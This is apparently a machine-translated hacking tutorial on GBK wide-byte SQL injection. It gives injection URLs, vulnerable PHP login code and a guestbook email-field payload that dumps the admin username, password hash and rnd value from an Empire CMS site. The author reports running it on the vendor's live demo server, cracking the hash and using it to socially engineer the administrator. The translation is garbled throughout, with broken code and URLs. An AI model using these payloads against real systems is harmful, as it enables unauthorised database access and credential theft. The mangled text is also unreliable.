Analysis on the CMS system Injection Vulnerability

Before introducing this vulnerability, it is necessary to clarify the concept of wide byte injection. Wide-byte injection is relative to single-byte injection. Single-byte injection is usually used to recover SQL statements after URLs with parameter IDs for injection. For example: http://www.hackest.cn/article.php? Id = 1 and 1 = 1 /*
Http://www.hackest.cn/article.php? Id = 1 and 1 = 2 /*
This classic example of determining whether a target has been injected is single-byte injection.
It seems that I haven't seen any usage yet. Anyone familiar with PHP + MySQL injection should understand that single quotes are definitely a good thing in injection. In particular, many programmers rely too much on the escape of functions such as magic_quotes_gpc, addslashes, and iconv. Theoretically, as long as the database connection code is configured with GBK encoding or the default encoding is GBK, injection vulnerabilities are everywhere in the current program. In fact, this transformation has also played a huge role in XSS and other fields. When PHP + Linux background programs are combined, it may also cause command injection, that is to say, you can directly execute Linux system commands at the injection point. For example, the Code for logging on to the login. php file is as follows:

<? Php $ conn = mysql_connect ("localhost", "root", "hackest"); mysql_query ("set names gbk"); mysql_select_db ("test", $ conn ); $ user = mysql_escape_string ($ _ GET [user]); $ pass = mysql_escape_string ($ _ GET [pass]); $ SQL = "select * from cms_user where username = $ user and password = $ pass"; $ result = mysql_query ($ SQL, $ conn ); while ($ row = mysql_fetch_array ($ result, MYSQL_ASSOC) {$ rows [] = $ row ;}?>

The following statements can be constructed for injection:
Http://www.hackest.cn/login.php? User = % df % 20or % 201 = 1% 20 limit % ,,1% 23 & pass =
% 20 is the URL encoding of space, % 23 is the URL encoding of #, one of the Mysql annotators. The corresponding SQL statement is:
Select * from cms_user where username = run or 1 = 1 limit # and password ="

Bytes ---------------------------------------------------------------------------------------
The above content is taken from the Internet. After analysis, it is used to describe the problem. The source is unknown. Thank you to your predecessors. ^-^
Bytes ---------------------------------------------------------------------------------------

Ii. Practice

The theory is almost ready. It's time to come to the actual point. This time, let's take the Emperor CMS as an example. Diguo CMS is known as the safest and most stable open-source CMS (Content Management System ). Part of the Code in this document is as follows:

// Permission if ($ gbr [groupid]) {include (".../../class/user. php ");

 

$ User= Islogin ();Include(".../../Class/MemberLevel. php");If($ Level_r[$ Gbr[Groupid] [level]>$ Level_r[$ User[Groupid] [level]){Echo"<Script> alert (your membership level is insufficient (".$ Level_r[$ Gbr[Groupid] [groupname]."), You are not authorized to submit information !); History. go (-1); </script>";Exit();}}Esetcookie ("Gbookbid",$ Bid, 0 );$ Bname=$ Gbr[Bname];$ Search="& Bid = $ bid";$ Page= (Int)$ _ GET[Page];$ Start= (Int)$ _ GET[Start];$ Line= 12;// Number of entries per page $ Page_line= 12;// The number of links displayed on each page $ Offset=$ Start+$ Page*$ Line;// Total offset $ Totalnum= (Int)$ _ GET[Totalnum];If($ Totalnum){$ Num=$ Totalnum;}Else {$ Totalquery="Select count (*) as total from {$ dbtbpre} enewsgbook where bid = $ bid and checked = 0";$ Num=$ Empire-> Gettotal ($ Totalquery);// Obtain the total number of entries }$ Search. ="& Totalnum = $ num";$ Query="Select lyid, name, email, 'call', lytime, lytext, retext from {$ dbtbpre} enewsgbook where bid = $ bid and checked = 0";// Hackest annotation: The key is this sentence. Why is it similar to the above example! $ Query=$ Query."Order by lyid desc limit $ offset, $ line";$ SQL=$ Empire-> Query ($ Query);$ Listpage= Page1 ($ Num,$ Line,$ Page_line,$ Start,$ Page,$ Search);$ Url="<A href =.../>".$ Fun_r[Index]."</A>".$ Fun_r[Saygbook];?>

Note comments! Author: hackest [h.s. T.]
Note comments! Take the official test directly, and I will not be involved in this machine. Official demonstration site: http://demo.phome.net/. In other words, the interface is quite refreshing, so many Webmasters can use it. Go straight to the message page: http://demo.phome.net/e/tool/gbook? Bid = 1. Be sure to bring bid = 1 (I downloaded the latest version of the Empire CMS, and the index is under the e/tool/gbook directory. PHP file, directly access it with an error prompt, and jump to the previous page ). Then drop down to "Please leave your words:" and fill in the relevant information as follows:
Name: 123 bytes
Email:, 1, (select concat (username, 0x5f, password, 0x5f, rnd) from phome_enewsuser where userid = 1 )/*
Contact number: Write it as needed
Message content: Write it as needed

2



After you submit the file, you can see the burst user name, password MD5, and rnd value. 3.



Wm_chief is a programmer who develops CMS. Because it has been submitted several times and cannot be deleted in the background, there are multiple records. After the password is cracked, you can log on to the background in plain text. However, the official demonstration site does not have the database operation permission. Any operations involving the database will prompt:

Online demonstration only allows viewing, and database-related operations are forbidden by administrators!
If your browser does not automatically Jump, click here

However, this MD5 cannot be found in online queries, and the plaintext is cracked using the MD5 rainbow table, which will be shown later. This background is just for you to see. By the way, you can experience its powerful functions (the official demo administrator username and password are both admin and can also be logged on, but they cannot be operated ), I used this password to go to the social worker and ask the administrator.